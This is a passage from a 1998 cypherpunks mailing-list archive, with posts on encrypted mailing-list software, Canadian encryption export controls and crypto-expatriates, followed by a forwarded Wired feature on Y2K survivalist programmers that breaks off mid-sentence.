-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNfRQJMUCGwxmWcHhAQHb7gf+ImnoGG28coDgde4cDgnwHyQatO78nY4B
9bMfB9bE1FCqAIZNKfrPzqhJpZzCbYEDYQexXe8bRsl32M7FnIye7w4r7kxeXxns
LbLWY83juOAJNgMhPxPhFVcXb8NqwOQzCnYjLdfKSuJ6/lZuNGvsVohHwYuhNxc9
WlOW1WsqeSl3KyzpdDyZU1jAUvNEJQU9JoeeEvlwFNM7zMW3ZoIQB5SSVLf2HYzX
vtpnZiRsOeSXt0sWmlXHiZ+DeB+79z1z157cg/AOn/qAGBLBgZuDp+dbRH7B4ynR
ngB6XS+irSzNnMWQrVdNYPuRPRRQ+h/eV+US2Cmjc3uuFcnR/+tnNg==
=0UKh
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Tue, 8 Sep 1998 08:48:15 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <d51409ab.35f45e17@aol.com>
Message-ID: <3.0.3.32.19980907174032.006c2e74@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:28 PM 9/7/98 EDT, CRBREW9802@aol.com wrote:
>how did u do it

i tink i smarter 'dan you, 'dats how.



-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
Knocked; you weren't in.                                  - Opportunity
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 8 Sep 1998 08:55:35 +0800
To: mgering@ecosystems.net
Subject: Re: cryptographically secure mailing list software
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284612@mossbay.chaffeyhomes.com>
Message-ID: <199809080053.RAA07220@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew James Gering writes:
> 
> 
> I've been curious as to whether anyone has developed and/or whether it
> is technically feasible to develop a cryptographically secure
> listserver.
> 
> e.g. 
> 
> User would submit their PGP public key to the listserver upon
> subscription, submitted messages would be encrypted with the
> listserver's public key, the listserver would decrypt the message and
> re-encrypt it with the key of all members and distribute it. This way
> the users don't need to manage all the keys or even know the list
> membership. Most listservers already have the ability to moderate
> subscription messages, the list would not be snoopable.
> 
> What sort of overhead would exist on a list of a few hundred members?

At ~1sec/ encryption (varies greatly depending on your list hardware, should
be less on a newer PC) adding an extra 200 seconds of CPU time for each 
mail message to the list is probably acceptable.


> If there is not something existing that will do this

Check out PGPdomo.

I found a copy at:
ftp://hawww.ha.osd.mil/pgpdomo/pgpdomo.tar.Z


-- 
Eric Murray          N*Able Technologies                    www.nabletech.com
(email:  ericm  at the sites lne.com or nabletech.com)     PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@systemics.ai>
Date: Tue, 8 Sep 1998 06:27:11 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: crypto-expatriatism
In-Reply-To: <v0401170db219f0b9c52c@[139.167.130.246]>
Message-ID: <E0zG9gU-0000D4-00@arianrhod.systemics.ai>
MIME-Version: 1.0
Content-Type: text/plain



(Note: my original message was posted to Cypherpunks, which I consider
to be substantially different than DBS: had I been posting to DBS, I would
have included different details...list differentiation is kin of useful,
it's why the different lists were created in the first place)
> 
> At 3:38 PM -0400 on 9/7/98, Robert Hettinga wrote about Ryan Lackey's
> whereabouts, on cypherpunks:
> 
> > If I told you, I would have to kill you?

I never said this.  If you'd like to fabricate/summarize/editorialize,
please make it clear that that's what you're doing, by using the traditionally
accepted editorial convention of square brackets, or some other convention.
I prefer Chicago Manual of Style, but I'm sure the AP Stylebook is acceptable.
> 
> Whew. Glad Ryan has now said something publically now about his and Ian's bit
> of extraterritorial subtrifuge (though Ian  doesn't qualify, of course). I
> mean, I just *hate* keeping secrets... ;-).
> 
Ian Goldberg isn't involved -- he's working on Zero Knowledge Systems,
AFAIK, and I wish him luck, but I haven't really spoken to him in months.  He's
a Canadian, anyway.  I haven't mentioned working with anyone else anywhere,
other than that I'm working for "interesting" clients.  If you know otherwise,
it isn't particularly public knowledge at this point.

> Frankly, I *really* have a hard time with all this
> man-without-a-first-world-country, crypto-expat stuff. I think making the
> technology not eonomically optional is the way to change things, and no
> amount of romantic, jurisdiction-shopping "regulatory arbitrage" is going
> to alter reality all that much.

I'm not breaking US law.  I'm a US citizen.  I pay my taxes, respect US
law, etc.  It's just that I'm choosing to work on something somewhere other
than the US, for a variety of reasons.

> And, I wish Vince -- and now, apparently, Ryan -- good luck, whatever happens.

Vince formally renounced his citizenship, becoming a citizen of a small
african country, and intends to remain in Anguilla.  I left the US
for a while to work on stuff, and to get away from a major US city for
a while.  I think there's a huge difference here.  What I have
done is fundamentally no different than going to Montana to write code
for a while, other than that it was cheaper and more convenient for me to
come to Anguilla.

(Of course, Vince seems to be doing quite well...)  I just happen to not want
to go back to the US right now, it's not that I can't if I decide I want
to at some point.

Thanks,
Ryan
(who generally does not provide confidential information to people
who do not like keeping secrets, out of kindness for them)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CRBREW9802@aol.com
Date: Tue, 8 Sep 1998 06:40:23 +0800
To: cypherpunks@toad.com
Subject: h
Message-ID: <d51409ab.35f45e17@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



how did u do it




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M Taylor <mctaylor@privacy.nb.ca>
Date: Tue, 8 Sep 1998 05:41:45 +0800
To: jkthomson <jkthomson@bigfoot.com>
Subject: Re: request for [cdn] export laws.
In-Reply-To: <3.0.3.32.19980905160024.0070f7c0@dowco.com>
Message-ID: <Pine.LNX.3.95.980907181430.12925A-100000@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 5 Sep 1998, jkthomson wrote:

> I have been looking for the export restrictions (if any) that regulate
> canadian encryption products.  I have tried searching the net for a little
> while, and although I have found a few (contradictory) blurbs on it, I have
> found no 'official' documents or links to them.  does this information
> exist on the web, and if not, who would be the best department to ask so
> that I get the least red-tape or 'runaround'?
> 
>  james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh

Yes Canada has export restrictions, which are handled by the Department of
Foreign Affairs and International Trade (DFAIT). The particular act you
should be interested in is the "Export and Import Control Act of Canada."
The DFAIT freely distributes "A Guide to Canada's Export Controls" which
was updated in 1996, and is available from the International Trade Centers
of the Gov't of Canada, see the blue pages in your phone book.

Excerpts from the Export Control List of Canada 
<http://axion.physics.ubc.ca/ECL.html> outline the regulations relating to
'Information Security' which includes encryption.

Encryption software may fall under the "General Software Note":
------------
This List does not embargo "software" which is either:

a.Generally available to the public by being: 
  1.Sold from stock at retail selling points, without restriction, by
  means of: 
    a.Over-the-Counter transactions; 
    b.Mail order transactions; or 
    c.Telephone call transactions; and 
  2.Designed for installation by the user without further substantial
  support by the supplier; or 
b.In the public domain". 

>From the definitions of pp 49-55

"In the public domain" 
  As it applies to the International Lists, means "technology" or 
"software" which has been made available without restrictions upon its
further dissemination.
N.B.
Copyright restrictions do not remove "technology" or "software" from being
"in the public domain". 
------------

Further references:
 Canadian Cryptography Page
 http://fractal.mta.ca/crypto/

 Canada's export controls by Marc Plumb <mp@the-wire.com> 
 http://www.efc.ca/pages/doc/crypto-export.html

 Excerpts from the Export Control List of Canada by W. G. Unruh
<unruh@physics.ubc.ca> 
 http://axion.physics.ubc.ca/ECL.html

 Department of Foreign Affairs and International Trade
 http://www.dfait-maeci.gc.ca/
 (I have yet to find anything of use from the DFAIT site)

 Cryptography / Cryptographie Industry Canada
 http://strategis.ic.gc.ca/crypto
 (talk about the idea of changes to current policy)

 International Crypto Law Survey, by Bert-Jaap Koops 
 http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm

 Canadian Export Controls on Encryption Products and Technology by Stewart
A. Baker and Michael D. Hintze
 http://www.steptoe.com/encryp.htm


--
M Taylor   mctaylor@  /  glyphmetrics.ca | privacy.nb.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Tue, 8 Sep 1998 06:41:35 +0800
To: rah@shipwright.com
Subject: Re: e$: crypto-expatriatism
In-Reply-To: <v0401170db219f0b9c52c@[139.167.130.246]>
Message-ID: <199809072239.SAA02421@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



> At 3:38 PM -0400 on 9/7/98, Robert Hettinga wrote about Ryan Lackey's
> whereabouts, on cypherpunks:
>
> > If I told you, I would have to kill you?
>
> Whew. Glad Ryan has now said something publically now about his and Ian's bit
> of extraterritorial subtrifuge (though Ian  doesn't qualify, of course). I
> mean, I just *hate* keeping secrets... ;-).

As secrets go, this was not a big one...  The main thing that is
meant to be confidential was the nature and names of our clients,
and under normal business practice, they hold the option(s) on PR.
I don't think anyone should need to die to protect that, as even then,
their main issue is (probably) not revealing a relationship with a
product until it did what they wanted.

> Frankly, I *really* have a hard time with all this
> man-without-a-first-world-country, crypto-expat stuff.

Well, it's not *quite* like that.  The US was seriously considered,
but Ryan's offer of a fraternity bedroom/office, T1 or no T1, was
not as attractive as some time in the sun.  After all, FC came to
Anguilla for good reasons.

Also, there are other sites under long term consideration, not
in the US, but in other cool places.  The main reason for
considering these sites is that they make business sense; and
they are definately cool.  Maybe we'll keep the details to
ourselves until they are vapour-compliant.

It should be mentioned that the contagion properties of
renouncement are somewhat less than epidemic.  Vince decided to
"do the deed," but others are not exactly leaping for their
passports and Lonely Planet guides.  In fact, most of the at-risk
group here are still swearing by the bible and running up the flag
every morning, just in case anybody gets the wrong idea.  Or at
least that's what it seems like to those of us immunised at birth.

iang




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 8 Sep 1998 10:25:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What we are Fighting
In-Reply-To: <Pine.GSO.3.95.980907143754.17348A-100000@well.com>
Message-ID: <Pine.GSO.3.95.980907192144.21371F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been politely corrected in email. I meant "allusion" of course. I
seem to find myself doing this more often lately... --Declan

On Mon, 7 Sep 1998, Declan McCullagh wrote:

> We even make an illusion to Monica's Cigar in a story in this week's Time.
> A Microsoft story I was working on died at the last moment, unfortunately.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Tue, 8 Sep 1998 10:32:37 +0800
To: cypherpunks@cyberpass.net
Subject: crossposting
In-Reply-To: <s5f44f00.016@aba.com>
Message-ID: <Pine.SOL.3.96.980907192817.470B-100000@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain




Ya know, I sometimes cross-post across lists when I shouldn't, so I'm
guilty of that too, but now that I'm on so many of these lists, I really
see the reasons behind one of the biggest complaints. I'm getting about 4
copies of each of the messages in the Vince Cate thread.

<insert gratuitous 'me too' here>

--mark--
-hedges-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 8 Sep 1998 08:13:45 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: cryptographically secure mailing list software (fwd)
Message-ID: <199809080031.TAA06618@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: cryptographically secure mailing list software
> Date: Mon, 7 Sep 1998 16:59:56 -0700 

> I've been curious as to whether anyone has developed and/or whether it
> is technically feasible to develop a cryptographically secure
> listserver.

> User would submit their PGP public key to the listserver upon
> subscription, submitted messages would be encrypted with the
> listserver's public key,

Actualy to be secure the subscriber would need to use one of the remailers
public key to encrypt their key prior to submission to the remailer. Of
course this doesn't prevent a MIT attack and key substitution. Otherwise
you'd be sending  your key in the clear, generaly a bad thing.

This touches on the main problem with distribution and use of PKE, in that
no secure key management protocal suitable for internet sort of
architectures has ever been developed that doesn't require some trusted 3rd
party or an existing secure channel.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 8 Sep 1998 10:52:22 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: A question about gas warfare in San Fran in '66...
In-Reply-To: <199809080109.UAA06813@einstein.ssz.com>
Message-ID: <199809080247.TAA09568@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:09 PM 9/7/98 -0500, Jim Choate wrote:
> Here in Austin we have a local radio dj who does a public 
> access show on various issue localy and nationaly, Alex 
> Jones, who has put a piece on some sort of bio-weapon test 
> that occurred in '66 in San Francisco. He is claiming that 
> deaths resulted.
>
> Anyone have a clue what he's talking about?

Had a bioweapons test occurred in the people's republic of 
San Francisco, it seems likely they would have erected 
billboards spelling out the details in letters visible from 
the moon.

I assume that this is one of these anonymous source things.  
According to official, yet anonymous sources the US/CIA 
forces committed every crime of every regime around the 
world, including the purported crimes of Pol Pot in Cambodia, 
(I kid you not) and they are actually running a totalitarian 
state in the USA but the people are too brainwashed to 
notice.  They also sell cocaine.

Similarly, according to sources that are not anonymous, but 
which (strange to report) no one else can find, Nike is 
actually producing its shoes in something very like slave 
labor camps.

The reason the refutation of the CNN story (US uses nerve gas 
to kill defectors and exterminate villagers) made such news 
is that CNN was so careless as to actually name identifiable 
real people as the source of this story. (They needed faces 
and it is hard to put the faces of anonymous sources on TV.) 
Naturally those real people were mighty pissed and denied the 
story attributed to them.

There is a wagon load of similar stories using supposedly 
official, but anonymous sources, or sources that do not 
appear to be real people.  The print media works much better 
for such sources than TV.

In short, do you think the internet is the net of a million 
lies?  Not so.  It is the place where lies get exposed. It is
far easier to get away with lying in the old media, because
nobody answers you back. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     q3LBLR6odNzwIKI1p2zeYnP4Kzv2MSbsmKm0u2M5
     4W6++mmQ2e3TnYU5J3oM1+BvPivukgtAcxEWE47MN
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Sep 1998 10:38:20 +0800
To: cypherpunks@cyberpass.net
Subject: wired on y2k
Message-ID: <199809080235.TAA23415@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Date: Tue, 08 Sep 1998 18:38:07 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Wired: "The Y2K Solution: Run for Your Life!!"

Source:  Wired
http://www.wired.com/wired/6.08/y2k.html

F E A T U R E|Issue 6.08 - August 1998 

The Y2K Solution: Run for Your Life!! 
 By Kevin Poulsen 

 Scott Olmsted is dressed to do some serious debugging: comfortable khaki
shorts, a T-shirt from a Visual Basic conference, and a visor from one of
his Silicon Valley employers. But we're a long way from the land of
cubicles and industrial parks. In fact, we're a long way from just about
everything. 

 Scott is debugging with a hammer, trying to remove a stubborn two-by-four
from the wall of a mobile home plunked down in the high desert of Southern
California. After banging away for a few minutes, he finally yanks the stud
off the wall in a flurry of sawdust and splintered wood. It's a small
victory, but it brings him one step closer to his own solution to the
greatest computer glitch in history - the Year 2000 Bug. With more than 20
years of computer programming experience under his belt, Scott has decided
that the only real fix for the Y2K problem may be to pack up and move to
this patch of land 75 miles from his San Diego home. "In the next year or
so," he predicts, "the most common cocktail party chatter will be, 'What
are you doing to prepare for Y2K?' But by then, it will be too late." 

 This is sagebrush country, the kind of place where you can hear your
footsteps crunching in the gravel. But even here, 30 miles from the nearest
interstate, a line of telephone poles runs along the dirt road and PacBell
terminal boxes sprout from the ground alongside the cacti. While carpet
installers work in the next room, Scott is planning for the day when it may
all be useless. The property came with a freshwater well, and he'll soon
have a solar panel for power. For protection against looters, he's about to
purchase his first gun. "I've seen how fragile so many software systems are
- - how one bug can bring them down," he worries. The idea of hundreds,
thousands, millions of bugs cascading all at once keeps him awake at night. 

 His Y2K retreat is easy to spot. In an area where high security means a
few strands of barbed wire clinging to a rusty pole, Scott's chain-link
fence is shiny and new. The alarm-company sign that hangs from the fence
would be more at home in Brentwood, and on the roof there's a DirecTV
satellite dish pointed toward the sky. The shed outside his back door will
hold nonperishable food. But with a programmer's methodical logic, Scott
didn't rush out to buy a year's worth of dehydrated grub. First he sampled
the fare from several distributors. One company sold a textured vegetable
protein that was a bit more expensive, but it came in a variety of flavors:
chicken, beef, and taco. "It was pretty good," Scott says, in the halting
measured tones of someone who doesn't want come across as a wacko. "We were
pleasantly surprised." So he splurged. What the hell, doomsday comes along
only once in a lifetime. 

 Throughout history, prophets and visionaries have spent their lives
preparing for the end of the world. But this time veteran software
programmers are blazing the millennial trail. The geeks have read the
future, not in the Book of Revelation, but in a few million lines of
computer code. 

 By now, the source of their anxiety is well known. In the 1950s and 1960s,
when the computer world was young and memory was expensive, programmers
developed a convention for marking the passage of time. It's the same
system most people use to date their checks: two digits for the day, two
for the month, and two for the year. Dropping the "19" from the year was
convenient, and it saved two bytes of precious RAM every time it was used. 

 Those were days of innocence and optimism. Everyone knew what would happen
if this little shortcut was still in use in AD 2000 - the two-digit year
would roll over like the odometer on an old Chevy, and the computers would
think they'd jumped 100 years into the past. Programmers knew it, and they
warned their managers. Not to worry, was the usual reply. When the
millennium finally rolls around, all this code will be ancient history. 

 But the code stuck around. The old software worked fine in the
postmainframe world, so nobody felt compelled to replace it. Instead, like
Roman architects, they just built on top of it. The two-digit year became a
standard, wired right into the heart of Cobol - the Common Business
Oriented Language that still serves as the digital workhorse of commerce
and industry. It also crept into the embedded microchips found in
everything from VCRs to nuclear power plants. For years the Y2K bug sat
quietly, remembered largely as an amusing textbook example of poor software
design. 

 But as 2000 drew near, the screwup became less amusing. In November 1996,
the comp.software.year-2000 newsgroup was launched, creating a forum that
would soon become ground zero for the Y2K survivalist movement. But at
first, the charter was clear: Discussions would be limited to Y2K bug
fixes, remediation strategies, and reports. 

 Over the course of the next year, information poured into the newsgroup,
and most of it was bad: The FAA was hopelessly behind schedule in patching
air-traffic-control systems; Edward Yardeni, chief economist for Deutsche
Morgan Grenfell Bank, laid odds that Y2K upheaval would trigger a
recession; Ed Yourdon, a respected software guru and author of 25 computer
books, predicted the collapse of the US government - not long after he
packed up and moved to New Mexico. 

 Optimism became a scarce commodity. Philosophical questions were raised:
Do programmers have a moral duty to remain at their keyboards until the
last moments of 1999, like captains on a sinking ship? Debates raged over
social Darwinism and the ownership of wheat in grain elevators. The
conversation moved on to the viability of dry dog food as emergency
rations. Plans were made to begin converting equities into gold and buying
land in remote parts of California, Arizona, and Oklahoma. January 1998 saw
250 cross-posts to misc.survivalism - up from an average of 30 a month in
late 1997. Gradually, a new acronym entered the Internet lexicon:
TEOTWAWKI, pronounced "tee-OH-tawa-kee." The End of the World as We Know
It. The
 Internet's very own survival movement was born. 

 Scott Olmsted has known about the Y2K bug since the 1980s, but he never
gave it much thought until early 1997, when he received a snail-mail flyer
from Gary North, a historian and early leader in the Y2K preparedness
movement. After reading it, Scott remembers feeling a vague sense of dread.
But as a rational guy and student of decision analysis - the science of
logical decision making in the face of chronic uncertainty - he didn't jump
to any conclusions. Instead, he went online to do some research. As he
pored over Web sites and news clippings, Scott felt himself moving through
the same psychological stages endured by people confronted with fatal
illness: denial, fading into anger, leading to a deep depression that
culminates in a sense of acceptance. "I'm still not 100 percent sure that
the world's coming to an end," he admits. "But the idea that I may want to
get out of town for a while is not such a long shot. It's enough to make me
want to prepare." 

 With the exception of his wife, most of the non-geeks closest to Scott
think he's a little nuts. His half-brother, Clark Freeman, thought he was
going overboard. But since then, Clark has come around a bit - he, too, is
planning to stockpile some food in case things get rough. 

 If his brother is taking Y2K so seriously, he figures there might well be
something to it. "Scott has always been the level-headed one," Clark
remembers. "The classic straightlaced nerd." 

 "I've spoken with friends and relatives about this, and I've gotten
nowhere," Scott sighs. Worse, some of the more intense Y2K survivalists
also think he's crazy - or at least a bit nave. After all, Scott plans to
celebrate New Year's Eve at his home in the suburbs; the place in the
desert will be there just in case things get rough. Then there's his fence
- - it has no perimeter alarms, and he isn't even trying to camouflage his
location. But worst of all, his hideaway is only a half tank of gas away
from Los Angeles - close enough to the big city that he could wake up one
postapocalyptic morning to find hordes of Los Angelinos parked outside his
desert redoubt. 

 The hardcores believe it will happen like this: On January 1 (or shortly
thereafter), the electricity grid will go dead. Groceries in America's
refrigerators will go bad. Food distribution systems will crash and store
shelves will go bare within days. Businesses will fail, either because they
aren't Y2K compliant or because they are dependent on noncompliant
customers and suppliers. As losses mount and companies go under, the stock
market will plummet. Banks will calculate interest for negative 100 years.
The government will stop issuing entitlement checks to gray-haired senior
citizens when their age suddenly clicks back to -35. Panic will set in.
Police dispatch systems will be crippled, and the only law will be the law
of the jungle. Desperate citizens will abandon the cities to hunt for
resources in rural areas. They'll come looking for the mad prophets - the
Y2K survivalists - ready to plunder their food, their heat, and their
communications links. They'll zero in on Scott and his conspicuous retreat
like a pack of wolves on the scent of a kill. 

 But they'd better stay away from Steve Watson's place. 

 Steve Watson, a 45-year-old systems analyst, is still kicking himself for
not preparing sooner. He didn't get going until early this year, and he
worries that he still has a lot of adjusting to do. As he puts it, "I
didn't even know how to tan a hide until a couple of months ago." 

 If all goes according to plan, Steve will ring in the new year at a secure
compound somewhere in southern Oklahoma. While the Pollyannas of the world
watch Times Square on the tube, he'll be listening to the radio for early
news of Y2K disaster. When the power goes black - perhaps at the stroke of
midnight - he'll be ready with a small arsenal of guns. A generator will
power his bunker indefinitely, but no light will escape to the outside -
none of Steve's neighbors will even know that there is a survivalist in
their midst. 

 Eight months ago, if you'd told Steve that Y2K survivalism would become
his obsession, he would have laughed in your face. Last year, he was a
happy-go-lucky Y2K project analysis manager for DMR Consulting, a
Canada-based computer consulting firm, just finishing up a big remediation
project for a major American phone company. The effort was grueling - 10
writers, programmers, and analysts cleaning up 10 million of lines of Cobol
code. But in the end it all worked out, and the phone company's billing
system was declared ready for 2000. 

 In that heady moment of self-congratulation, Bill Finch, one of Steve's
coworkers, approached him with a thought. "Steve," he said, "don't you
realize that everything stops if the power grid goes down?" 

 Anxiety set in. The telephone company had poured substantial resources
into its Y2K effort. Even then, Steve's project had been an odyssey plagued
with countless unexpected glitches and snags. If the power utilities - with
their Byzantine grid of thousands of generators and substations around the
continent - weren't already well along in their efforts, then all the
systems he'd dragged into Y2K compliance would be dead as doornails when
the lights went out. 

 That afternoon, Steve hit the Net, where he learned that the situation is
far worse than he had imagined. The power grid relies on a sophisticated
feedback mechanism: Remote terminal units report their power needs up the
communications chain that controls the output of electricity generators.
The entire network is riddled with embedded chips. Nuclear plants supply
nearly 20 percent of the power in the grid, and none of them have been
certified as Y2K compliant. Charles Siebenthal, head of the Year 2000
embedded systems project at the Electric Power Research Institute, says the
industry is just beginning to look for potential Y2K failure points.
Anecdotes from industry consultants suggest that if the year 2000 came
today, every utility in the country would crash. "No electric plant or
facility of any kind has been Y2K tested without some kind of impact," says
David Hall, a senior consultant with the Cara Corporation. "There isn't
enough time to fix everything. There will be some disruption. How long? How
deep? We just don't know." 

 Then there are ripple effects to consider. "There's not a single railroad
switch in the country that's manual anymore," Steve says. "They're all
computer controlled, and railroads deliver coal and fuel to power plants." 

 Exit Steve Watson, bright-eyed optimist; enter the new Steve Watson, Y2K
survivalist, rugged pioneer, and Renaissance man in training. Steve began
spending six hours a day on the Internet, studying alternative power,
construction techniques, and emergency medical procedures. Anything he
couldn't find online, he ordered from local bookstores or Amazon.com. He'd
never kept a gun in the house, but soon he had three: a 30-30 for deer
hunting, a .22 for small game, and a 9-mm handgun for personal protection.
Of course, the 9-mm is practically a popgun against looting mobs, so four
M-16 assault rifles are also on the way. 

 Finally, he pooled his money with Bill Finch, his DMR coworker, to buy 500
remote acres in Oklahoma. (Bill holds the public deed to the property, so
his name has been changed in this article to keep the location secret.) In
choosing the hideaway site and its size, Steve overengineered to account
for family and friends - few of whom subscribe to his Y2K scenario. "Most
people think I'm nuts. Even my kids think, Dad's going off the deep end."
Steve's wife, Teresa, has been more supportive. She's no computer expert,
but her Baptist faith tells her that the Four Horsemen of the Apocalypse
could ride in with a global computer crash. Meanwhile, Steve is making
plans for everyone else: close friends, family members, sisters-in-law,
brothers-in-law - and their children, mothers, and fathers. Forty people in
all. In 2000, they'll work together to till the soil and patrol the fence
line. 

 Steve's doomsday vision is the same as that of most Y2K radicals, but
radicals can pop up in some pretty mainstream places - like the US Central
Intelligence Agency, which is advising its agents abroad to keep cash on
hand and stockpile extra blankets in preparation for New Year's Day 2000.
The agency worries that bugs in the power networks and communications
backbones of developing nations could cause outages that would jeopardize
the safety and well-being of its agents. 

 Millions of Americans have already gotten a small taste of critical system
failure. When the onboard control system of the Galaxy IV communications
satellite failed on Tuesday, May 19, 1998, the outage temporarily crippled
US pager networks, several broadcast news operations, and even credit card
verifications systems. Most of the disruptions were brief - technicians
were able to switch to backup communications paths - but doctors who use
pagers as a lifeline with patients and colleagues were forced to set up
camp in hospitals and offices. The failure of one satellite threw a wrench
into the mechanisms of modern life, perhaps providing a peek at what life
may be like at the dawn of the new millennium. 

 Or sooner. While the full brunt of the Y2K bug is reserved for AD 2000,
some early problems are already developing. In 1996, Visa and MasterCard
temporarily stopped issuing credit cards with an expiration date of 2000
after credit card verification terminals began choking on the "00." The
gaffe led to customer complaints and a lawsuit filed by a suburban Detroit
grocery store against its computer supplier, TEC America Inc. Since then,
most verification systems have been upgraded, but Y2K is making its
presence known in other areas. The Information Technology Association of
America released a survey last March showing 44 percent of the US companies
they polled have already experienced Y2K failures. Ninety-four percent of
the respondents termed Y2K a "crisis." 

 The GartnerGroup estimates that 180 billion lines of code need to be
examined and that 20 to 30 percent of all firms worldwide have not yet
started preparing for Y2K. Many of these are expected to suffer significant
failures. In a series of studies issued over the last year, Gartner
surveyed 15,000 companies in 87 countries to assess their Y2K readiness.
The results weren't encouraging. Small companies rated lowest - for most,
winning over new customers has taken priority over the Y2K problem. But
midsize and large companies are lagging, too. Gartner then rated the
overall Y2K efforts of industrialized nations on a scale of zero to five,
where five is total compliance on all systems. The highest scorers on the
scale, including the US, Canada, and Australia, rated somewhere between two
and three - a score that suggests they have completed an inventory of Y2K
vulnerabilities, but not yet developed a comprehensive remediation plan. 

 The US may be at the front of the pack in the Y2K race, but that's small
comfort to some legislators. Last March, the House Subcommittee on
Government Management, Information, and Technology warned that 37 percent
of the critical systems used by federal agencies will not be ready in time.
Then in June, California Republican Stephen Horn, who heads the
subcommittee, issued a scathing report card on the Clinton administration's
Y2K progress. He gave the government an F. 

 John Koskinen, head of the president's Year 2000 Conversion Council,
complains that Horn is just a tough grader. "As a government, we're in a C+
to B range," he argues. Koskinen keeps a digital desktop clock that runs
backward - on the day we spoke, the clock showed 609 days, 8 hours, 39
minutes, 16 seconds, and counting - but he generally refrains from calling
the situation a crisis. Instead, he describes it as a "critical management
challenge." 

 He fully expects the federal government's critical systems to be ready on
time, or even early. "Many companies, financial institutions, and federal
agencies are still working on the problem," he says. "But most major
organizations plan to have their solutions in place by the first quarter of
next year." 

 If the council is successful, Koskinen believes, Americans will confront
little more than a few minor inconveniences when the year 2000 finally
rolls around. "There's not enough information right now to indicate that
stocking up on Coleman stoves and Sterno is an appropriate response," he
says. And in the end, he predicts, "a lot of people won't notice." 

 Koskinen has earned the respect of some Y2Kers by emphasizing the need for
high-level planning in the event that some systems fail. But Y2K
survivalists feel more comfortable with their own personal contingency
plans, and a commercial infrastructure is already forming to support them.
Walton Feed, an Idaho food distributor that sells products over the Net, is
doing a brisk business in long-term supplies; the company attributes this
to Y2K. And in Sully County, South Dakota, developer Russ Voorhees has
attracted national publicity and hundreds of potential clients for his
"Heritage Farms 2000" project - a Y2K survival community that's been on
hold since June, when a local planning commission refused to grant the
necessary building permits. For those who want to go it alone, there's a
sense of adventurous fun in their preparations - the pride of
self-sufficiency and an excuse to get away from the keyboard to earn some
merit badges. But Y2K preparedness is not just a Boy Scout fetish, and it
isn't always about getting away from it all. 

 "If everybody moves to rural areas, they'll just take their problems with
them," explains Paloma O'Riley, a red-haired, forty-something mother, wife,
and computer expert. Paloma lives in the small town of Louisville,
Colorado, just east of Boulder, and when she looks around her community she
doesn't see potential looters - she sees neighbors. Her suburban hamlet has
become a major landmark on the Y2K map as the world headquarters of The
Cassandra Project, a grassroots Y2K preparedness organization that can
